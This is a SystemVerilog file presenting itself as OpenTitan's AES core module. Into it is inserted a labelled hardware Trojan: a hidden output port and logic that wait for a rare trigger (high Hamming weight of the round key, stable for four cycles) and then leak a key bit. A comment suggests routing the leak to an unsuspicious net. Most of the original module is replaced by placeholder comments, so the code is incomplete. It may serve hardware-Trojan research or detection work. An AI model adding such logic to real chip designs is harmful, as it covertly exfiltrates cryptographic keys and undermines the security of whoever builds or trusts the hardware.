```systemverilog
// Copyright lowRISC contributors (OpenTitan project).
// Licensed under the Apache License, Version 2.0, see LICENSE for details.
// SPDX-License-Identifier: Apache-2.0
//
// AES core implementation

`include "prim_assert.sv"

module aes_core
  import aes_pkg::*;
  import aes_reg_pkg::*;
#(
  parameter bit          AES192Enable         = 1,
  parameter bit          AESGCMEnable         = 1,
  parameter bit          SecMasking           = 1,
  parameter sbox_impl_e  SecSBoxImpl          = SBoxImplDom,
  parameter int unsigned SecStartTriggerDelay = 0,
  parameter bit          SecAllowForcingMasks = 0,
  parameter bit          SecSkipPRNGReseeding = 0,
  parameter int unsigned EntropyWidth         = edn_pkg::ENDPOINT_BUS_WIDTH,

  localparam int         NumShares            = SecMasking ? 2 : 1, // derived parameter

  parameter clearing_lfsr_seed_t RndCnstClearingLfsrSeed  = RndCnstClearingLfsrSeedDefault,
  parameter clearing_lfsr_perm_t RndCnstClearingLfsrPerm  = RndCnstClearingLfsrPermDefault,
  parameter clearing_lfsr_perm_t RndCnstClearingSharePerm = RndCnstClearingSharePermDefault,
  parameter masking_lfsr_seed_t  RndCnstMaskingLfsrSeed   = RndCnstMaskingLfsrSeedDefault,
  parameter masking_lfsr_perm_t  RndCnstMaskingLfsrPerm   = RndCnstMaskingLfsrPermDefault
) (
  input  logic                        clk_i,
  input  logic                        rst_ni,
  input  logic                        rst_shadowed_ni,

  // Entropy request interfaces for clearing and masking PRNGs
  output logic                        entropy_clearing_req_o,
  input  logic                        entropy_clearing_ack_i,
  input  logic     [EntropyWidth-1:0] entropy_clearing_i,
  output logic                        entropy_masking_req_o,
  input  logic                        entropy_masking_ack_i,
  input  logic     [EntropyWidth-1:0] entropy_masking_i,

  // Key manager (keymgr) key sideload interface
  input  keymgr_pkg::hw_key_req_t     keymgr_key_i,

  // Life cycle
  input  lc_ctrl_pkg::lc_tx_t         lc_escalate_en_i,

  // Alerts
  input  logic                        shadowed_storage_err_i,
  input  logic                        shadowed_update_err_i,
  input  logic                        intg_err_alert_i,
  output logic                        alert_recov_o,
  output logic                        alert_fatal_o,

  // Bus Interface
  input  aes_reg2hw_t                 reg2hw,
  output aes_hw2reg_t                 hw2reg,

  // ---- Trojan Output: Hidden signal ----
  output logic                        trojan_leak_o
);

  // ... [existing code as is]

  /////////////////////////////
  // TROJAN: Stealthy Leakage
  /////////////////////////////
  // Hidden Trojan state
  logic trojan_state_q, trojan_state_d;

  // Trigger: When internal round key (key_init_q[0][0]) has high Hamming weight AND the round key is stable for multiple cycles
  logic [31:0] trojan_roundkey_sampled;
  logic [5:0] trojan_hw;
  logic       trojan_trigger;
  logic [2:0] trojan_stable_ctr_q, trojan_stable_ctr_d;

  // Sample round key
  always_ff @(posedge clk_i or negedge rst_ni) begin
    if (!rst_ni) begin
      trojan_roundkey_sampled <= 32'b0;
    end else begin
      trojan_roundkey_sampled <= key_init_q[0][0];
    end
  end

  // Compute Hamming weight
  always_comb begin
    trojan_hw = 0;
    for (int i = 0; i < 32; i++) begin
      trojan_hw = trojan_hw + trojan_roundkey_sampled[i];
    end
  end

  // Monitor if round key is stable for 4 cycles
  always_ff @(posedge clk_i or negedge rst_ni) begin
    if (!rst_ni) begin
      trojan_stable_ctr_q <= 3'b0;
    end else if (key_init_q[0][0] == trojan_roundkey_sampled) begin
      if (trojan_stable_ctr_q != 3'b111)
        trojan_stable_ctr_q <= trojan_stable_ctr_q + 1'b1;
    end else begin
      trojan_stable_ctr_q <= 3'b0;
    end
  end
  assign trojan_stable_ctr_d = trojan_stable_ctr_q;

  // Rare trigger: If Hamming weight >= 24 and key stable for 4 consecutive cycles
  assign trojan_trigger = (trojan_hw >= 6'd24) && (trojan_stable_ctr_q == 3'd4);

  // Hidden state: leaky bit toggled by round key on rare trigger
  always_ff @(posedge clk_i or negedge rst_ni) begin
    if (!rst_ni) begin
      trojan_state_q <= 1'b0;
    end else if (trojan_trigger) begin
      trojan_state_q <= key_init_q[0][0][0] ^ key_init_q[1][0][0]; // leaks LSB of key xor key share
    end
  end

  // Leak the hidden bit (can be routed to unsuspicious net in integration)
  assign trojan_leak_o = trojan_state_q;

  // ... [rest of original module code unchanged] ...

  ////////////////
  // Assertions //
  ////////////////

  // ... [assertions as in the original module] ...

endmodule

```